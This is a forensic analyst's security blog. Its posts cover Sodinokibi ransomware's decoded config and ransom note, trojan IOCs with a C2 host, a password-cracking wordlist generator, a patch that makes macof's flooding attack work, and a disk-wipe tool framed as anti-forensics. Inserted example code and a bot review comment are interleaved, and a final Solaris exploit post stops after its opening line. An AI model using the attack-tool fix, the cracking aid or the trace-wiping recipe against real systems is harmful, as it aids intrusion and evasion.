Importing Windows Event Logs into Elasticsearch

· One min read
Jan Starke
Senior Forensic Analyst

Historically, there were two options to import Windows Event Logs into Elasticsearch:

  • using Winlogbeat, which requires a running Windows machine
  • using plaso, which works only with complete images, but not with triage data such as a handful of evtx files. Additionally, plaso doesn't support Elasticsearch 7 or above, so this is not an option either.

As a result, I decided to implement a script which imports a bunch of evtx files into an elasticsearch index:

https://github.com/teeshop/evtxtools

Originally you had to create your own index template to make sure that all event_data fields are imported as text; that is no longer necessary, no index template is required anymore.

Does Sodinokibi use bad crypto?

· 4 min read
Jan Starke
Senior Forensic Analyst

Over the last few days I was able to analyze a sample of the Sodinokibi ransomware (9fde430060112b2ebe83536cfd9de49d0cda04be1e7d83d848fbf68b30855fde).

During dynamic analysis I discovered that the malware contains a PE section named .lfge4i. The content of this section is decoded at run time and yields the following configuration (I reformatted it to improve readability):

 {
"pk":"3sB5vqBW0kuO3Nr56Ql+TMjaDchoEjxcKxBA/XbSJks=",
"pid":"48",
"sub":"2360",
"dbg":false,
"fast":false,
"wipe":true,
"wht":{
"fld":[
"$windows.~bt",
"program files",
"google",
"program files (x86)",
"boot",
"msocache",
"system volume information",
"mozilla",
"application data",
"appdata",
"perflogs",
"tor browser",
"programdata",
"windows",
"$recycle.bin",
"$windows.~ws",
"windows.old",
"intel"
],
"fls":[
"iconcache.db",
"bootfont.bin",
"bootsect.bak",
"thumbs.db",
"ntuser.ini",
"ntldr",
"autorun.inf",
"boot.ini",
"ntuser.dat",
"desktop.ini",
"ntuser.dat.log"
],
"ext":[
"com",
"bat",
"cur",
"scr",
"diagpkg",
"lnk",
"icl",
"diagcfg",
"lock",
"msc",
"msu",
"ani",
"cpl",
"386",
"hta",
"cmd",
"ocx",
"shs",
"hlp",
"exe",
"ico",
"nls",
"adv",
"bin",
"icns",
"theme",
"drv",
"wpx",
"spl",
"cab",
"msstyles",
"sys",
"msi",
"themepack",
"msp",
"mpa",
"deskthemepack",
"key",
"idx",
"mod",
"rom",
"prf",
"nomedia",
"dll",
"diagcab",
"ps1",
"ics",
"rtp",
"ldf"
]
},
"wfld":[
"backup"
],
"prc":[
"xfssvccon",
"thebat",
"firefox",
"dbsnmp",
"synctime",
"mydesktopqos",
"msaccess",
"outlook",
"tbirdconfig",
"isqlplussvc",
"mydesktopservice",
"steam",
"visio",
"wordpad",
"winword",
"infopath",
"agntsvc",
"mspub",
"ocomm",
"ocautoupds",
"encsvc",
"powerpnt",
"thunderbird",
"oracle",
"onenote",
"sql",
"excel",
"ocssd",
"dbeng50",
"sqbcoreservice"
],
"dmn":"[list of several hundred domains removed]",
"net":false,
"svc":[
"mepocs",
"veeam",
"sql",
"vss",
"sophos",
"memtas",
"backup",
"svc$"
],
"nbody":"[ransom note text, shown decoded below]",
"nname":"{EXT}-readme.txt",
"exp":false,
"img":"QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA",
"arn":false
}

What are the contents of nbody and img? That's simple:

nbody

---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.

By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.

To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.

If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!

a) Download and install TOR browser from this site: https://torproject.org/

b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:

a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)

b) Open our secondary website: http://decryptor.top/{UID}

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:

Key:

{KEY}

Extension name:

{EXT}

-----------------------------------------------------------------------------------------

!!! DANGER !!!

DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.

!!! !!! !!!

ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.

!!! !!! !!!

img

All of your files are encrypted!

Find {EXT}-readme.txt and follow instuctions

Bad crypto

In my eyes, the interesting part of the section is the following entry:

"pk":"3sB5vqBW0kuO3Nr56Ql+TMjaDchoEjxcKxBA/XbSJks="

The value of this entry (256 bits, i.e. 32 bytes once base64-decoded) is decoded and stored in a global static variable at 0x00??DBA0 (the address may differ on your system at the position I marked with ??). Unfortunately, I was not able to spot any further read or write access to this address yet, but I'm working on it.

Other traces

File size

All encrypted files have the same size as their unencrypted counterparts. This means:

  • some kind of stream cipher is being used, i.e. a cipher (or mode) that does not pad, such as AES-CTR or AES-GCM
  • no metadata (such as a header or an authentication tag) is stored inside the files themselves

Domains

The entry dmn contains a list of domains which may be compromised and may be used to spread malware. So I filed a report and sent the full list to the police. Let's see if they can inform all potential victims. For now, you should at least log accesses to the mentioned sites.
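As an added example (my own code, not part of the original post or of the sample), here is a Python helper that turns the decoded configuration into a hunting summary: it checks the size of pk, decodes img (base64-wrapped UTF-16LE), splits dmn into host/port pairs and renders nname. The sample configuration is a constructed subset of the values shown above, and is_whitelisted() encodes my assumed reading of the wht lists (folders, file names and extensions the sample skips), which the post itself does not spell out.

```python
import base64
import json
from typing import Any, Dict, List, Optional, Tuple

# Constructed subset of the decoded .lfge4i configuration shown above: the
# "dmn" value is cut down to three entries, the other values are quoted as-is.
SAMPLE_CONFIG = '''{
"pk":"3sB5vqBW0kuO3Nr56Ql+TMjaDchoEjxcKxBA/XbSJks=",
"pid":"48",
"sub":"2360",
"wht":{"fld":["windows","$recycle.bin","program files"],
       "fls":["ntldr","boot.ini"],
       "ext":["exe","dll","sys"]},
"wfld":["backup"],
"prc":["outlook","sql","thunderbird"],
"dmn":"letterscan.de;avtoboss163.ru:443;nginx.com",
"svc":["veeam","sql","vss","backup","svc$"],
"nname":"{EXT}-readme.txt",
"img":"QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"
}'''


def load_config(text: str) -> Dict[str, Any]:
    """Parse the decoded configuration (plain JSON after the sample's own decoding step)."""
    return json.loads(text)


def decode_utf16_blob(b64: str) -> str:
    """Decode a base64 string wrapping NUL-terminated UTF-16LE text (the "img" field)."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le").rstrip("\x00")


def key_bits(b64: str) -> int:
    """Size in bits of the decoded "pk" value (the post measures it as 256 bits)."""
    return len(base64.b64decode(b64)) * 8


def split_domains(dmn: str) -> List[Tuple[str, Optional[int]]]:
    """Split the ';'-separated "dmn" value into (host, port); entries without ':port' get None."""
    out: List[Tuple[str, Optional[int]]] = []
    for entry in filter(None, dmn.split(";")):
        host, sep, port = entry.rpartition(":")
        if sep and port.isdigit():
            out.append((host, int(port)))
        else:
            out.append((entry, None))
    return out


def render_note_name(template: str, ext: str) -> str:
    """Fill the {EXT} placeholder of "nname" with the per-victim extension."""
    return template.replace("{EXT}", ext)


def is_whitelisted(path: str, wht: Dict[str, List[str]]) -> bool:
    """ASSUMED semantics of "wht": a file is skipped when one of its parent folders is
    listed in "fld", its file name in "fls", or its extension in "ext" (case-insensitive)."""
    parts = [p.lower() for p in path.replace("\\", "/").split("/") if p]
    if not parts:
        return False
    name, folders = parts[-1], parts[:-1]
    ext = name.rsplit(".", 1)[1] if "." in name else ""
    return (any(f in wht.get("fld", []) for f in folders)
            or name in wht.get("fls", [])
            or ext in wht.get("ext", []))


def summarize(config_text: str) -> Dict[str, Any]:
    """Collect the parts of the configuration a defender wants to hunt for.
    The post does not state what the sample does with "prc"/"svc"; they are listed as-is."""
    cfg = load_config(config_text)
    return {
        "pk_bits": key_bits(cfg["pk"]),
        "pid_sub": (cfg.get("pid"), cfg.get("sub")),
        "processes": sorted(cfg.get("prc", [])),
        "services": sorted(cfg.get("svc", [])),
        "domains": split_domains(cfg.get("dmn", "")),
        "note_name_template": cfg.get("nname"),
        "wallpaper_text": decode_utf16_blob(cfg["img"]),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_CONFIG), indent=2))
    wht = load_config(SAMPLE_CONFIG)["wht"]
    for p in (r"C:\Windows\System32\ntdll.dll", r"C:\Users\bob\notes.txt"):
        print(p, "skipped" if is_whitelisted(p, wht) else "encrypted")
```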

New Malware: "Pro InvoiceWMZ45445"

· 2 min read
Jan Starke
Senior Forensic Analyst

During the last few days I received two mails with the following attachment:

Pro InvoiceWMZ45445.rar

which contains an .exe file with the same name:

Metadata of Pro InvoiceWMZ45445.exe:

  • MD5: 4EE08155DB928C449EDEA28D6A68B8CA
  • SHA1: 6F57853E8788E2BD8E1433D8B2E1A701774593A4
  • File Version: 1.0.0.1
  • File Description: TODO: <File description>
  • Created with: Microsoft Visual C++ ver. 8.0 [DEBUG] / Visual Studio 2005

Indicators of Compromise (IOC) of Pro InvoiceWMZ45445.exe:

Upon execution, the file does the following:

  • waits 30 seconds
  • creates a file sample.exe under %AppData%\Roaming\New folder
  • starts the previously created file
  • registers sample.exe under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sample (autostart)
  • changes some Internet Explorer settings

Metadata of sample.exe:

sample.exe has the same hashes as Pro InvoiceWMZ45445.exe. Interesting, isn't it? So this malware isn't a dropper; instead it installs itself under a different name.

Indicators of Compromise (IOC) of sample.exe:

  • creates the mutant \Sessions\1\BaseNamedObjects\MUTEX-zZEeV-Zndko
  • tries to resolve fredamata81.ddns.net
  • tries to connect to port 2015 of fredamata81.ddns.net (which seems to be closed at the moment)
  • consumes a lot of CPU time (20% on my machine)

Additional Information

  • The executable has its debug information stored externally in d:\bak_desktop\new folder\stub1000_11_25_2015b\debug\stub1000_11_25_2015b.pdb. I assume the file was compiled on 2015/11/25. Maybe ;-)

More dynamic analysis will follow soon. First I must remove the call to IsDebuggerPresent(). But not today...

Update:

Virustotal has documented this specimen under https://www.virustotal.com/de/file/bf6c2c3f9cbb35023a38516e6b438f9125b7056429804c88c444fa37e0254956/analysis/
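An added example, not from the original post: a small Python matcher that checks normalized endpoint events against the indicators listed above (hashes, drop path, Run key, mutant, DNS name and port). The event records are constructed for the demonstration, and the field names (type, path, key, query, dst_host, dst_port, name) are my own and would need mapping to your telemetry source.

```python
import re
from typing import Any, Dict, List, Tuple

# Indicators taken from the post. The drop path is matched on its tail only,
# because the user profile prefix varies per machine.
IOCS: Dict[str, Any] = {
    "md5": "4ee08155db928c449edea28d6a68b8ca",
    "sha1": "6f57853e8788e2bd8e1433d8b2e1a701774593a4",
    "drop_path": re.compile(r"\\new folder\\sample\.exe$", re.I),
    "run_key": re.compile(r"^hkcu\\software\\microsoft\\windows\\currentversion\\run\\sample$", re.I),
    "mutex": re.compile(r"\\basenamedobjects\\mutex-zzeev-zndko$", re.I),
    "c2_host": "fredamata81.ddns.net",
    "c2_port": 2015,
}

# Constructed events in a made-up normalized schema (roughly Sysmon-shaped).
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Roaming\New folder\sample.exe",
     "md5": "4EE08155DB928C449EDEA28D6A68B8CA"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Sample",
     "value": r"C:\Users\alice\AppData\Roaming\New folder\sample.exe"},
    {"type": "dns_query", "query": "fredamata81.ddns.net"},
    {"type": "net_connect", "dst_host": "fredamata81.ddns.net", "dst_port": 2015},
    {"type": "mutex_create", "name": r"\Sessions\1\BaseNamedObjects\MUTEX-zZEeV-Zndko"},
    {"type": "dns_query", "query": "www.example.com"},
]


def match_event(ev: Dict[str, Any]) -> List[str]:
    """Return the names of all indicators this single event matches (empty list if none)."""
    hits: List[str] = []
    kind = ev.get("type")
    if kind == "file_create":
        if str(ev.get("md5", "")).lower() == IOCS["md5"]:
            hits.append("md5")
        if str(ev.get("sha1", "")).lower() == IOCS["sha1"]:
            hits.append("sha1")
        if IOCS["drop_path"].search(str(ev.get("path", ""))):
            hits.append("drop_path")
    elif kind == "registry_set" and IOCS["run_key"].match(str(ev.get("key", ""))):
        hits.append("run_key")
    elif kind == "dns_query" and str(ev.get("query", "")).lower() == IOCS["c2_host"]:
        hits.append("c2_host")
    elif kind == "net_connect":
        if str(ev.get("dst_host", "")).lower() == IOCS["c2_host"]:
            hits.append("c2_host")
            # Port 2015 alone is far too generic to alert on; only count it
            # together with the host name.
            if ev.get("dst_port") == IOCS["c2_port"]:
                hits.append("c2_port")
    elif kind == "mutex_create" and IOCS["mutex"].search(str(ev.get("name", ""))):
        hits.append("mutex")
    return hits


def scan(events: List[Dict[str, Any]]) -> List[Tuple[int, List[str]]]:
    """Run match_event over an event stream and return (index, matched indicators) for hits."""
    results: List[Tuple[int, List[str]]] = []
    for idx, ev in enumerate(events):
        hits = match_event(ev)
        if hits:
            results.append((idx, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx} ({SAMPLE_EVENTS[idx]['type']}): {', '.join(hits)}")
```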

Merging wordlist files

· 3 min read
Jan Starke
Senior Forensic Analyst

Sometimes when cracking passwords, one has to create password candidates that are combinations of words from a wordlist. Unfortunately, common password cracking tools do not support this. That makes perfect sense, because the task of a password cracking tool is cracking passwords. So we need a tool that creates the line-wise cross product of two text files.

Using perl, this is a simple task:

#!/usr/bin/perl -w
use strict;
use warnings;
use Getopt::Long;

my $first      = '-';
my $second     = undef;
my $dest       = '-';
my $max_length = undef;

sub Usage(;$) {
    my $usage = '';
    if (my $message = shift) {
        $usage .= $message . "\n";
    }
    $usage .= "crossproduct.pl --first=<infile> --second=<infile> --dest=<outfile> [--length=<n>]\n";
    return $usage;
}

sub ValidateInputFile($) {
    my $filename = shift;
    return if $filename eq '-';
    -f $filename or die Usage("'$filename' is not a file");
    -r $filename or die Usage("'$filename' is not readable");
}

sub ValidateOutputFile($) {
    my $filename = shift;
    return if $filename eq '-';
    # if the file does not exist yet, it will be created on open
    return unless -e $filename;
    -f $filename or die Usage("'$filename' is not a file");
    -w $filename or die Usage("'$filename' is not writable");
}

GetOptions(
    "first=s"  => \$first,
    "second=s" => \$second,
    "dest=s"   => \$dest,
    "length=i" => \$max_length,
) or die Usage();

defined($first)  or die Usage("missing first input file");
defined($second) or die Usage("missing second input file");
($first ne '-' or $second ne '-') or die Usage("cannot combine stdin with itself");

ValidateInputFile($first);
ValidateInputFile($second);
ValidateOutputFile($dest);

my ($first_fh, $second_fh, $dest_fh);
if ($first eq '-') {
    $first_fh = *STDIN;
} else {
    open($first_fh, '<', $first) or die Usage("$first: $!");
}

if ($second eq '-') {
    $second_fh = *STDIN;
} else {
    open($second_fh, '<', $second) or die Usage("$second: $!");
}

if ($dest eq '-') {
    $dest_fh = *STDOUT;
} else {
    open($dest_fh, '>', $dest) or die Usage("$dest: $!");
}

# The inner loop is rewound with seek() for every line of the outer loop,
# so stdin (which cannot be rewound) must always be the outer file.
my ($outer_fh, $inner_fh, $outer_line, $inner_line);
my ($first_ref, $second_ref);    # references to the line holding each word part
if ($first eq '-') {
    ($outer_fh, $inner_fh)    = ($first_fh, $second_fh);
    ($first_ref, $second_ref) = (\$outer_line, \$inner_line);
} else {
    ($outer_fh, $inner_fh)    = ($second_fh, $first_fh);
    ($first_ref, $second_ref) = (\$inner_line, \$outer_line);
}

while ($outer_line = <$outer_fh>) {
    chomp $outer_line;
    seek($inner_fh, 0, 0);
    while ($inner_line = <$inner_fh>) {
        chomp $inner_line;
        my $word = $$first_ref . $$second_ref;
        $word = substr($word, 0, $max_length) if $max_length;
        print $dest_fh "$word\n";
    }
}

The script has 4 parameters:

Parameter   Meaning
--first     file name of the wordlist for the first part of the generated words, or "-" for stdin (the default value)
--second    file name of the wordlist for the second part of the generated words, or "-" for stdin
--dest      name of the file where the generated wordlist will be stored, or "-" for stdout (the default value)
--length    maximum length of the generated words; all words longer than this value are truncated. This parameter is optional. If you use it, you should pipe the output to uniq

Rexgen is back again

· One min read
Jan Starke
Senior Forensic Analyst

... with a new version 1.2.3 and a new repository location: https://github.com/janstarke/rexgen

New features:

  • improved uppercase/lowercase variation: 'a(?i:bc)' creates abc, abC, aBC, aBc
  • that's it. But I had to rewrite a lot of the internal data representation so that the modifier i (ignore case) can be the first one in a long list of additional iterators. One of my ideas for the next versions is some kind of Levenshtein iterator: a modifier that creates all variants of a word with a Levenshtein distance of 1

What else is new?

  • John the Ripper (jumbo) uses the new API of rexgen, so you can build the newest version of JtR together with the newest version of rexgen

  • wfuzz does not use rexgen until now. I created a fork of wfuzz: https://github.com/janstarke/wfuzz. Unfortunately, xmendez ignores my pull request :-( But you can use my fork and I will try to keep it up to date

So long

How to (not) hack jasa's blog

· 3 min read
Jan Starke
Senior Forensic Analyst

Today, a strange guy tried to hack this blog. He didn't succeed. What a shame. So, in this post, I will try to give you some hints about what to do and what not to do if you're trying to hack into this blog:

  1. Try to guess my username and password. Start with jasa. This is not my username, but you can try it anyway. I'm a hacker, so try good passwords first. You're a hacker too, so you are using good passwords as well. Start with your own passwords; maybe all hackers use the same passwords. Nope. Try "Raketenkatze123". Nope. Use the wordlist you've found on the internet. After the first 1000 attempts I know which wordlist you are using and can check whether my password is part of it. ...which is one thing I regularly do with all of my passwords, as soon as I find a new good wordlist.

  2. Try to find some cross site scripting. After you've found one (there is none known), you can 2.a Send a malicious link to me, to steal my session 2.b Create a malicious comment, to steal my session 2.c Create a malicious comment, to exploit one of the currently known cross site request forgery vulnerabilities in wordpress.

Have you first checked if wordpress is vulnerable against session hijacking, before you fill wordpress's log files and my mailbox with your useless attempts? By the way:

  1. Make sure that no one knows you. Although I cannot read wordpress's log files, you've been so kind to try to create a malicious comment. I've got a notification about this. Now, I have your IP address and the corresponding time. Did you know that it is possible to identify the computer you are using at the moment? The power feature is called "Telecommunications data retention"

  2. Try to find a SQL injection vulnerability. Good luck. In the meantime I was able to geolocate your position, using your IP. Until now, you violated at least 2 statutes of the country you are living in.

  3. Before you did some reconnaissance, hopefully you made sure that no other legal persons are involved in your attack. Now, you determine that my blog is not hosted by me, but by wordpress.com, whose place of jurisdiction is the United States. D'oh. They know your IP address, too.

  4. Double-check that you typed the URL of this blog using your keyboard. You didn't want to click on a link to this blog, because I could see your Referer :-b

  5. This is a blog about security (among others). Make sure your browser is up to date before you open this page (TODO: I must move this entry to position 1)

Kind regards

See you tomorrow, M. :-)

BTW, I forgot to say that you forgot to do a port scan against the LB of wordpress.com. Which doesn't matter anymore ... Knock knock

Measuring Forensic Readiness

· 2 min read
Jan Starke
Senior Forensic Analyst

Most of our customers need help optimizing their infrastructure security. What does that mean? You want to

  • minimize your attack surface
  • prevent any successful attacks on (publicly) available services
  • limit the impact of successful attacks
  • be able to recover after a successful attack
  • know what actually happened

This last point, knowing what actually happened, can be achieved through various approaches:

  • You could log all significant events
  • You could use a SIEM component to collect, correlate and evaluate all log events and, if you want to, netflow data
  • You can do forensic analysis of your hard drives, log files, etc.

Forensic readiness first seemed to us to be simply the situation in which you are able to do forensics. But this is not precise enough. In fact, we can distinguish multiple levels of forensic readiness, depending on which of the following questions you are able to answer:

  1. Did anything happen at all?
  2. What were the symptoms of the incident?
  3. When did the symptoms first arise?
  4. Which systems are affected?
  5. What exactly happened to the affected systems?
  6. At which day and time did the attack start?
  7. Which other machines are compromised as well?
  8. From which machines did the attack originate?
  9. Which user account was used to initially run the attack?
  10. Which persons are able to use the user account that ran the attack?

The more of these questions you are able to answer (in order) when an incident occurs, the more "forensic ready" you are.

Invalid TCP segments created by macof

· 2 min read
Jan Starke
Senior Forensic Analyst

Some days ago, we used the tool macof, which is part of the dsniff package, in a penetration test. We observed that our attack had no effect on the hosts in the network, so we started sniffing around. Wireshark was our friend.

Wireshark flagged the packets generated by macof as "invalid". It took us some time to realize that the Total Length value in the IP header was indeed wrong! We used macof to send TCP SYN segments to a specific port, so Total Length should be 40 (20 byte IP header + 20 byte TCP header), but macof generated packets with a value of 20.

So we started a little code reading session and found the following statements in macof.c:

libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

libnet_build_ipv4(LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

Obviously, the length of the IP header is not included in this value: the first argument of libnet_build_ipv4() is the total length of the IP packet including the IP header itself, not the length of the payload behind it. We changed the above statements to

libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H, 0, libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);

with the result that Wireshark no longer complained about our packets.

And, more importantly, our attack now worked :-)

After the test, I sent an email to the author of macof and dsniff, including a patch with our change, but until today I have received no answer. So, I'll publish our patch here, and you are free to use it:
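The check Wireshark applied to our packets is easy to reproduce. The following C program is an added example (not part of dsniff or of the original post): `build_syn()` writes a minimal IPv4 + TCP SYN segment into a buffer with whatever Total Length the caller asks for, and `check_ipv4_tcp()` performs the sanity checks a dissector runs before trusting the packet. The addresses and ports used in `main()` are constructed sample values; the function names are ours.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV4_H 20
#define TCP_H  20

/* Outcome of the sanity check a dissector applies before trusting a packet. */
enum ip_check {
    IP_OK = 0,
    IP_BAD_VERSION_OR_IHL,
    IP_BAD_CHECKSUM,
    IP_LEN_BELOW_HEADER,       /* Total Length < IHL * 4 */
    IP_LEN_BEYOND_CAPTURE,     /* Total Length > bytes actually on the wire */
    IP_TCP_HEADER_TRUNCATED    /* Total Length leaves fewer than 20 bytes for TCP */
};

/* ones-complement sum over the IPv4 header (RFC 791 header checksum) */
static uint16_t ip_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)(hdr[i] << 8 | hdr[i + 1]);
    if (len & 1) sum += (uint32_t)hdr[len - 1] << 8;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build a minimal IPv4 + TCP SYN segment (no options, no payload) into buf and
 * return the number of bytes written. total_length is written verbatim into the
 * IP header, so the caller can reproduce the macof bug (20 instead of 40). */
size_t build_syn(uint8_t *buf, uint16_t total_length,
                 uint32_t src, uint32_t dst, uint16_t sport, uint16_t dport)
{
    memset(buf, 0, IPV4_H + TCP_H);
    uint8_t *ip = buf, *tcp = buf + IPV4_H;

    ip[0] = 0x45;                                   /* version 4, IHL 5 (20 bytes) */
    ip[2] = total_length >> 8; ip[3] = total_length & 0xff;
    ip[8] = 64;                                     /* TTL, as in macof */
    ip[9] = 6;                                      /* protocol: TCP */
    ip[12] = src >> 24; ip[13] = src >> 16; ip[14] = src >> 8; ip[15] = src;
    ip[16] = dst >> 24; ip[17] = dst >> 16; ip[18] = dst >> 8; ip[19] = dst;
    uint16_t csum = ip_checksum(ip, IPV4_H);        /* computed with the field zeroed */
    ip[10] = csum >> 8; ip[11] = csum & 0xff;

    tcp[0] = sport >> 8; tcp[1] = sport & 0xff;
    tcp[2] = dport >> 8; tcp[3] = dport & 0xff;
    tcp[12] = 0x50;                                 /* data offset 5 (20 bytes) */
    tcp[13] = 0x02;                                 /* flags: SYN */
    tcp[14] = 0x02; tcp[15] = 0x00;                 /* window 512, as in macof */
    /* TCP checksum left at zero: it is not part of the length check below */
    return IPV4_H + TCP_H;
}

enum ip_check check_ipv4_tcp(const uint8_t *pkt, size_t caplen)
{
    if (caplen < IPV4_H || (pkt[0] >> 4) != 4 || (pkt[0] & 0x0f) < 5)
        return IP_BAD_VERSION_OR_IHL;
    size_t ihl = (pkt[0] & 0x0f) * 4u;
    if (caplen < ihl) return IP_BAD_VERSION_OR_IHL;
    if (ip_checksum(pkt, ihl) != 0) return IP_BAD_CHECKSUM;   /* sum over a valid header folds to 0 */
    size_t total = (size_t)pkt[2] << 8 | pkt[3];
    if (total < ihl) return IP_LEN_BELOW_HEADER;
    if (total > caplen) return IP_LEN_BEYOND_CAPTURE;
    if (pkt[9] == 6 && total - ihl < TCP_H) return IP_TCP_HEADER_TRUNCATED;
    return IP_OK;
}

/* Build a SYN with the given Total Length value and run the check on it. */
enum ip_check check_syn_with_length(uint16_t total_length)
{
    uint8_t pkt[IPV4_H + TCP_H];
    /* constructed sample: 10.0.0.1:40000 -> 10.0.0.2:80 */
    size_t n = build_syn(pkt, total_length, 0x0a000001, 0x0a000002, 40000, 80);
    return check_ipv4_tcp(pkt, n);
}

int main(void)
{
    printf("Total Length 20 (unpatched macof): check = %d\n", check_syn_with_length(20));
    printf("Total Length 40 (patched macof):   check = %d\n", check_syn_with_length(IPV4_H + TCP_H));
    return 0;
}
```

With Total Length 20 the IP header claims that the datagram ends exactly where the TCP header begins, which is why a receiving stack drops the segment without ever looking at the SYN flag; the same check also explains why the patched value must grow again if a payload is ever attached.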

 diff -rupN dsniff-2.4_beta1-r6/macof.c dsniff-2.4_beta1-r6_FIX/macof.c
--- dsniff-2.4_beta1-r6/macof.c	2015-01-20 08:50:53.980054279 +0100
+++ dsniff-2.4_beta1-r6_FIX/macof.c 2015-01-20 08:51:24.220054894 +0100
@@ -134,7 +134,7 @@ main(int argc, char *argv[])
libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
0, 0, LIBNET_TCP_H, NULL, 0, l, 0);

- libnet_build_ipv4(LIBNET_TCP_H, 0,
+ libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, 0,
libnet_get_prand(LIBNET_PRu16), 0, 64,
IPPROTO_TCP, 0, src, dst, NULL, 0, l, 0);
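Review bot: the new first argument of `libnet_build_ipv4()` (`LIBNET_IPV4_H + LIBNET_TCP_H`) hard-codes the same assumption as the `LIBNET_TCP_H, NULL, 0` passed to `libnet_build_tcp()` two lines above, namely a TCP header without options and without payload. If either call ever gets a payload, the two lengths silently drift apart again, which is exactly the class of bug this hunk fixes; computing the length once into a variable and using it in both calls would prevent that. The return values of both `libnet_build_*` calls are also discarded; libnet signals a failed build with -1, so a failure would go unnoticed until the packets are sniffed.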

Userspace tool for (anti-forensically safe) wiping unallocated disk space

· 2 min read
Jan Starke
Senior Forensic Analyst

This is just a simple idea and could as easily be rewritten in, e.g., PowerShell, Perl, Python or whatever you want.

I had some problems compressing the image of a virtual machine that had been used intensively for a long period of time. I deleted all files inside the VM, but this does not really wipe the data, so the blocks of deleted files must be compressed as well. The simple fix for this is to overwrite unallocated blocks with zeros.

Now, how do we accomplish this? Easy: we create a new file and fill it with zeros. When the disk is full (fwrite() fails), we are done and delete the file. That's it. Note that this only reaches clusters the filesystem currently considers free: slack space at the end of existing files, the filesystem journal, and blocks that an SSD's wear levelling has remapped are not touched.

Here is the code. Feel free to reimplement it in the language of your choice:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#ifdef _WIN32
#include <io.h>          /* _unlink() */
#define unlink _unlink
#else
#include <unistd.h>      /* unlink() */
#endif

const size_t block_size = 512;
const size_t block_count = 1;
static const char* filename = "diskwipe.dat";
static char* block = 0;
static FILE* fp = NULL;

/* release the zero block, close the fill file if still open, and delete it */
void cleanup(void) {
    if (block) {
        free(block);
        block = NULL;
    }

    if (fp != NULL) {
        fflush(fp);
        fclose(fp);
        fp = NULL;
    }

    if (0 != unlink(filename)) {
        perror("Unable to delete diskwipe.dat");
    }
}

void finish(int res) {
    cleanup();
    exit(res);
}

void handle_sigint(int sig) {
    (void)sig;
    finish(1);
}

/* write zero blocks until the filesystem is full, i.e. until fwrite() fails */
void do_wipe(void) {
    unsigned long int count = 0;
    /* "wb" is portable; the fflush() below commits each block, which MSVC's "c" flag did */
    fp = fopen(filename, "wb");
    if (fp == NULL) {
        perror("Unable to open diskwipe.dat");
        finish(1);
    }

    while (block_count == fwrite(block, block_size, block_count, fp)) {
        fflush(fp);  /* push every block to disk so the loop stops exactly when the disk is full */
        fprintf(stderr, "\r%lu", ++count);
    }
    fclose(fp);
    fp = NULL;       /* cleanup() must not close it a second time */
}

int main(int argc, char* argv[]) {
    (void)argc; (void)argv;
    signal(SIGINT, handle_sigint);

    block = (char*) malloc(block_size);
    if (block == NULL) {
        perror("malloc");
        return 1;
    }
    memset(block, 0, block_size);

    do_wipe();
    finish(0);
    return 0;
}

By the way, this is a very simple way of doing anti-forensics:

  1. do bad stuff
  2. delete your files/traces
  3. do a userspace wipe using a built-in scripting language, preferably a one-liner

Solaris: exploiting buffer overflows in lx zones

· 7 min read
Jan Starke
Senior Forensic Analyst

This article shows that it is possible to execute shellcode in a Linux zone on Solaris, provided the shellcode has a particular structure.

